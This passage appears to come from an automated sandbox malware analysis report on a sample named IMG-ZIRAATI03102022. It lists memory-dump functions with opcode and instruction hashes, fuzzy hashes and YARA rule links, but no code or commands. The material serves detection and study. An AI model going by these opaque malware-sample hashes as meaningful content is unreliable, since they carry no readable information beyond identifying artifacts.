                                                                                                                              • Instruction ID: 6d76df310ca97fb8ce3f8500c84e3f1bf723eb251e48812af8c564c43d047a6f
                                                                                                                              • Opcode Fuzzy Hash: 2eaca417ac70f801d421ef1c6d4a6fd705753884426267f4c0cfe935b4d84bd9
                                                                                                                              • Instruction Fuzzy Hash: DBE02632B203104F8B86672D38144BF3BFB9BCA22032940BBE84BC3304DEA04C038791
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06069DD0 Relevance: .0, Instructions: 27COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: db8174ffcbba6fae95b9400f2112b9f366a5886baf3fdb5d5f69dadce1c07a0e
                                                                                                                              • Instruction ID: 139a8fa2b058906c331bf4d216182e80a805e1123b4516e5e3f934f1496a6ef0
                                                                                                                              • Opcode Fuzzy Hash: db8174ffcbba6fae95b9400f2112b9f366a5886baf3fdb5d5f69dadce1c07a0e
                                                                                                                              • Instruction Fuzzy Hash: 57E08C22340520274B98616F6C149EFAECE8BC9564714803AB11DC3341DC288D4243FA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060642E8 Relevance: .0, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 43a879a34b49cacefc95bb4a6d50003da4e429598ce7f037b0ddf2cd2c48d707
                                                                                                                              • Instruction ID: 10a26ffa7213837f712ac2f2a25aa388ebb35fd18cf7625b5aa6912e578e5efe
                                                                                                                              • Opcode Fuzzy Hash: 43a879a34b49cacefc95bb4a6d50003da4e429598ce7f037b0ddf2cd2c48d707
                                                                                                                              • Instruction Fuzzy Hash: 18D02B31340220278218256F3C40A7BBBCFE7CD6B2B540039F20DC7340CC618C0682E0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06065AF6 Relevance: .0, Instructions: 25COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: d53cbc4bb4ce7184eead117408bf893aa15fbcbcb69c0dabb90d24e7e308933b
                                                                                                                              • Instruction ID: 3c57c6225d80e220b068e0a80d610b01620241f4b1abcadab36f7a2530e9732f
                                                                                                                              • Opcode Fuzzy Hash: d53cbc4bb4ce7184eead117408bf893aa15fbcbcb69c0dabb90d24e7e308933b
                                                                                                                              • Instruction Fuzzy Hash: 43E086327D031077E76455199C41FEE77969BD5B10F20C127F615AB6D0C9F06C025688
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606B648 Relevance: .0, Instructions: 24COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1806ff40dc54cfcfd1ca5d727b9cb9d31b68542fc5ac208e57dc3db38f9ac331
                                                                                                                              • Instruction ID: 370763a2bcfcb78a893f1d2cbd05b1012a42166fe46a9072e89a35eca0555314
                                                                                                                              • Opcode Fuzzy Hash: 1806ff40dc54cfcfd1ca5d727b9cb9d31b68542fc5ac208e57dc3db38f9ac331
                                                                                                                              • Instruction Fuzzy Hash: E6F06D72C0534AEFCB41EFB4CE5665CBFB0AB46200F6046AAC904EBA50E2354B208B40
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06065AF8 Relevance: .0, Instructions: 24COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 91a8cfa6e5cd3bd4273682e517d8c329e0d8165af8afd1647d2aca8017a86c9f
                                                                                                                              • Instruction ID: 9a9208ae9ae48a9674460c68bf254a7d36fac446b8cfcbfea6b17504076e524a
                                                                                                                              • Opcode Fuzzy Hash: 91a8cfa6e5cd3bd4273682e517d8c329e0d8165af8afd1647d2aca8017a86c9f
                                                                                                                              • Instruction Fuzzy Hash: 48E0C2323D021433E660651ADC41F9A779A9BD5B20F208127F719AF2C0C9F0BC0152DC
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606A7F9 Relevance: .0, Instructions: 24COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0b69e67fe4248b460a0c9592bf693a70fba9c48e23bd184800d6c81d64311e3c
                                                                                                                              • Instruction ID: 34183fc00a11dde1fc5d63d77f19c1ba5c24813afe6b48cee5216edb85d36bdb
                                                                                                                              • Opcode Fuzzy Hash: 0b69e67fe4248b460a0c9592bf693a70fba9c48e23bd184800d6c81d64311e3c
                                                                                                                              • Instruction Fuzzy Hash: 3EE07D35F802128FC7A43256E8102F7BBE6CB85031B008076FC058B314C9F18C4383C2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606A800 Relevance: .0, Instructions: 24COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e3b42560ab1d6b1e732aa0995fce0d8704a90808d6c76cb5743bc4f497c808d8
                                                                                                                              • Instruction ID: cfb07b3bf74f3f6ca1f8467489245658372b32c6b3e7daba86fe64692df9b961
                                                                                                                              • Opcode Fuzzy Hash: e3b42560ab1d6b1e732aa0995fce0d8704a90808d6c76cb5743bc4f497c808d8
                                                                                                                              • Instruction Fuzzy Hash: 4AE02630F802218F87E8222AD4202BB7AD6CBC5024B01C075E8078B354CEF18C4383C1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06065AA0 Relevance: .0, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9852599c5a4f94d956b477b8a5a78f5fcb83de7e816613868dbb93dc248b082e
                                                                                                                              • Instruction ID: f5a7783a66331e309c7bb26b37cc2f43ea91fbce5bf588b62613332cd389f2a0
                                                                                                                              • Opcode Fuzzy Hash: 9852599c5a4f94d956b477b8a5a78f5fcb83de7e816613868dbb93dc248b082e
                                                                                                                              • Instruction Fuzzy Hash: 5EE06D70D15349EFCF41EFB4D8555ADBFB1EF4A210F6042EACA00A7241D2344E20DB41
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067848 Relevance: .0, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6853c420eab823ceeb250896114bfebd1052161d144bf9bc954ce27c5d7cd4ad
                                                                                                                              • Instruction ID: 106e45452619e8cb07db74b43288fca116653dd9fccdc59d5322202961455426
                                                                                                                              • Opcode Fuzzy Hash: 6853c420eab823ceeb250896114bfebd1052161d144bf9bc954ce27c5d7cd4ad
                                                                                                                              • Instruction Fuzzy Hash: 5BD05E36710220570A54221E785857F36DF97CD5313184036F50AC3304CDA08C0343E1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06069140 Relevance: .0, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f3eca6af4b6753b256092c84ad14d31fdcf72911be29abd30ab4b663f3ade48b
                                                                                                                              • Instruction ID: 043587fbda07af3b6d92b679585eb71d6624b74d98d5f0d826eeee1f98d38242
                                                                                                                              • Opcode Fuzzy Hash: f3eca6af4b6753b256092c84ad14d31fdcf72911be29abd30ab4b663f3ade48b
                                                                                                                              • Instruction Fuzzy Hash: 8BD05E317502305B4B99327EAC1449F7ADE8AC9965314403EF019C3340DD658C0283FA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606E940 Relevance: .0, Instructions: 22COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 72c360996873490d28d2b96c4b2ec3fd57e1391546bfc6496259e9cb65bb6a5a
                                                                                                                              • Instruction ID: 55cc40473c8e15613be7fe7f6e2440b6ee88e1677112fedd7f3aa496cd355c2f
                                                                                                                              • Opcode Fuzzy Hash: 72c360996873490d28d2b96c4b2ec3fd57e1391546bfc6496259e9cb65bb6a5a
                                                                                                                              • Instruction Fuzzy Hash: B7D05E31750230574B9D327EAC1899F7ADECACA965314403EF009C3340DD658C0243FA
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067EE0 Relevance: .0, Instructions: 21COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6b9143f975361a2ed60d30cd36912693f7e7c701d17797d483a053a4f2bb2d39
                                                                                                                              • Instruction ID: b9273cb6ed21993f0d922e563fa9e84767f7db84a17bdf7da674dab38c731bfc
                                                                                                                              • Opcode Fuzzy Hash: 6b9143f975361a2ed60d30cd36912693f7e7c701d17797d483a053a4f2bb2d39
                                                                                                                              • Instruction Fuzzy Hash: A8D0C23D8492C4EE8760ABB4380A4F73FA44605011B00049AE98883B02E52404818BF2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 060622CF Relevance: .0, Instructions: 19COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 043b175cea0fb9bec9ebdfa8c5908143d1f7bdd1c89e8c702614b197b1185eda
                                                                                                                              • Instruction ID: 14c8241582905b7b71ad7dfac02378e52039470a05adcc0b2e4b13174c194850
                                                                                                                              • Opcode Fuzzy Hash: 043b175cea0fb9bec9ebdfa8c5908143d1f7bdd1c89e8c702614b197b1185eda
                                                                                                                              • Instruction Fuzzy Hash: CBE05B755852825FD74B4E65A8840D57BE1DF9663030F40A9D805CF225E63D8C47DA51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606B658 Relevance: .0, Instructions: 18COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4583f066bb11bf822c48b1705ff931832b60f1c756768937adecb8488e323b90
                                                                                                                              • Instruction ID: db3370989bdcefebdb06abc89ffaa8e1e51cdcdeb1fe2299a20c9c7e45bbe6e5
                                                                                                                              • Opcode Fuzzy Hash: 4583f066bb11bf822c48b1705ff931832b60f1c756768937adecb8488e323b90
                                                                                                                              • Instruction Fuzzy Hash: 4FE0EC70D1030DEBCF40FFF899456ADBFB4AB45600FA046A99A04A7240E6755B109B80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06065AB0 Relevance: .0, Instructions: 18COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fd81801e66a04ea6885de07e338c1620de830c43b57a8baee0b8e479bf228dc1
                                                                                                                              • Instruction ID: 081b6170cdb20f0415f29cf4e48e26d3e8645a1baf12237d2682b0f13c7a2445
                                                                                                                              • Opcode Fuzzy Hash: fd81801e66a04ea6885de07e338c1620de830c43b57a8baee0b8e479bf228dc1
                                                                                                                              • Instruction Fuzzy Hash: E2E0EC70D1030CEFCB40FFF4D9496ADBFB5EB59610FA046A9DA04A7344E6355A509B81
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606773A Relevance: .0, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3bc30e79c3a5aec1aa0f0ceb272e19e1cd64fe4bc1449cdeeb230271143aa600
                                                                                                                              • Instruction ID: a95b3367e2f524c351353afc03e20e461d0f11047299f0f0015c9be49fdd97e5
                                                                                                                              • Opcode Fuzzy Hash: 3bc30e79c3a5aec1aa0f0ceb272e19e1cd64fe4bc1449cdeeb230271143aa600
                                                                                                                              • Instruction Fuzzy Hash: E6D0A73AF440128F5B50C669FC0019DB3E0EB8427C71091B3D90AD3204EB30CD46C7C0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606BB4A Relevance: .0, Instructions: 17COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ae6987784d35bc7b7c2fa99f4888ad62462f712368ec0ff68e77db5e9f29e89
                                                                                                                              • Instruction ID: 34d89ae4de4427a88ae0c76a05aa1318e8cc522299867c15e3a1386c1dec71cc
                                                                                                                              • Opcode Fuzzy Hash: 6ae6987784d35bc7b7c2fa99f4888ad62462f712368ec0ff68e77db5e9f29e89
                                                                                                                              • Instruction Fuzzy Hash: E2D0C93A21D2D44BC75B263874245EB7F26A76B51071A02DBE58A87A87C9280D4687F2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06068D01 Relevance: .0, Instructions: 16COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5d3c02b1cb034c1c79fbaec441ff931fb2151c9b6b2e75e5b7603da55a0c2877
                                                                                                                              • Instruction ID: cb89e10138d087fccd3ce7a3eaa54d1eddcb82700c5e7f0889a17c7f771722f3
                                                                                                                              • Opcode Fuzzy Hash: 5d3c02b1cb034c1c79fbaec441ff931fb2151c9b6b2e75e5b7603da55a0c2877
                                                                                                                              • Instruction Fuzzy Hash: 06C0123905F3A12FD31706306C139F23FA99C8312038E42CBE4808ECA2C525160A86F7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06064B3F Relevance: .0, Instructions: 14COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f08dc2e2c0b5062955089b9fafd15ea1cb90b37c7f0ea10c2c4548c3264aa86d
                                                                                                                              • Instruction ID: 6b7e1efb082ecd05f2ebf100a93836563626d5fec76ef264b71ec5bb2b8c08eb
                                                                                                                              • Opcode Fuzzy Hash: f08dc2e2c0b5062955089b9fafd15ea1cb90b37c7f0ea10c2c4548c3264aa86d
                                                                                                                              • Instruction Fuzzy Hash: 12D01239F45520CF8A55DBB4D55459CB3E49F44A1C7024099EE1BDB370CB209D11C7C1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067ED7 Relevance: .0, Instructions: 13COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e208d4848148ca000dbf3715019a7af01a313cce16f4d6bf218ff5a5af2a025f
                                                                                                                              • Instruction ID: be71ce060ac2ae5f1891bf8e713ae0cc31a40ce4d1a69c31c9249d244ee9c0d5
                                                                                                                              • Opcode Fuzzy Hash: e208d4848148ca000dbf3715019a7af01a313cce16f4d6bf218ff5a5af2a025f
                                                                                                                              • Instruction Fuzzy Hash: 9ED09E39A01008DBCB44DF84E5409DDFB71FB88325F20C05BED1567350C7329A56CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067EF0 Relevance: .0, Instructions: 12COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 504a9d16ee68d4fd2022dd6c676b63476759ba8220e58a5ba07d474846d648a7
                                                                                                                              • Instruction ID: 34156786d597a916017014f4385929e7e9c6e1f6c053cc58a683708a67147e32
                                                                                                                              • Opcode Fuzzy Hash: 504a9d16ee68d4fd2022dd6c676b63476759ba8220e58a5ba07d474846d648a7
                                                                                                                              • Instruction Fuzzy Hash: 15C01230C49388DF8B40EFB9680A42A7FB89604105F8005A5DD09D3305E63955108BD2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606BBF0 Relevance: .0, Instructions: 12COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 834df9cb09b587b5a891c9436e49192b20d352012e74e754cbaf0356644b1315
                                                                                                                              • Instruction ID: ec949dc24e678d8794232b67bd17a09cb27045d77615297c197a3c7a5337a9d7
                                                                                                                              • Opcode Fuzzy Hash: 834df9cb09b587b5a891c9436e49192b20d352012e74e754cbaf0356644b1315
                                                                                                                              • Instruction Fuzzy Hash: 3EC0922E40E3902BCA1211747D225EB3F2A598793C38B08D3E894CBD63C91809D742F3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06067806 Relevance: .0, Instructions: 12COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 73424cf8c3ceb9ce5c5b21dc6438039e9ede10830d746c6ca99f8d024a287487
                                                                                                                              • Instruction ID: 5c27b5282a8e28e15ed39e65ea6ac43022e94bd82885a3036ba0f5db1fea01c2
                                                                                                                              • Opcode Fuzzy Hash: 73424cf8c3ceb9ce5c5b21dc6438039e9ede10830d746c6ca99f8d024a287487
                                                                                                                              • Instruction Fuzzy Hash: F1D0C936F001098B8F40EB94E8944DDF772EB84225B108022D52AA7114CA315956CB80
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 06068D68 Relevance: .0, Instructions: 9COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a5ccaf448ffd10d148d9741f90dab45492d39dfd5991b94cb0036cea10b9b49a
                                                                                                                              • Instruction ID: 6050a2c2ed180664bcff6b39be33ad50e22882234d420ac4aa398aeb79bcc295
                                                                                                                              • Opcode Fuzzy Hash: a5ccaf448ffd10d148d9741f90dab45492d39dfd5991b94cb0036cea10b9b49a
                                                                                                                              • Instruction Fuzzy Hash: 5BC02BB39C00048FCB0CDF04F4C50C0B360FD4123331000A6D005C7012C2258407CE50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606016F Relevance: .0, Instructions: 8COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: fedc4c186d6bdd4999fe3e34ba6dfaff122dec3150a610c63b0e6d186ad310a7
                                                                                                                              • Instruction ID: d2dfbd6dc0665f27cd91c4823d14cfde6a99c3b8f76f5fd37be07211abfa6245
                                                                                                                              • Opcode Fuzzy Hash: fedc4c186d6bdd4999fe3e34ba6dfaff122dec3150a610c63b0e6d186ad310a7
                                                                                                                              • Instruction Fuzzy Hash: A5B09237A00009CB8F10DB89F8598DDF330FB9427AB104067E211A204086321A25CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0606BF49 Relevance: .0, Instructions: 7COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.425214465.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_6060000_IMG-ZIRAATI03102022.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 48dedd779b831763721fa5fa83ef4e11ec4c45dc6ff62684dbedc6df4524813e
                                                                                                                              • Instruction ID: eef9327704327c4fded7ef77cd9bfd15b8295a8352d3f7c6f5def28bd633a32c
                                                                                                                              • Opcode Fuzzy Hash: 48dedd779b831763721fa5fa83ef4e11ec4c45dc6ff62684dbedc6df4524813e
                                                                                                                              • Instruction Fuzzy Hash: 4FB01235813781ABCF215730B6294C5BF157E4222530104DCD24140E128B7641DACB70
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Non-executed Functions

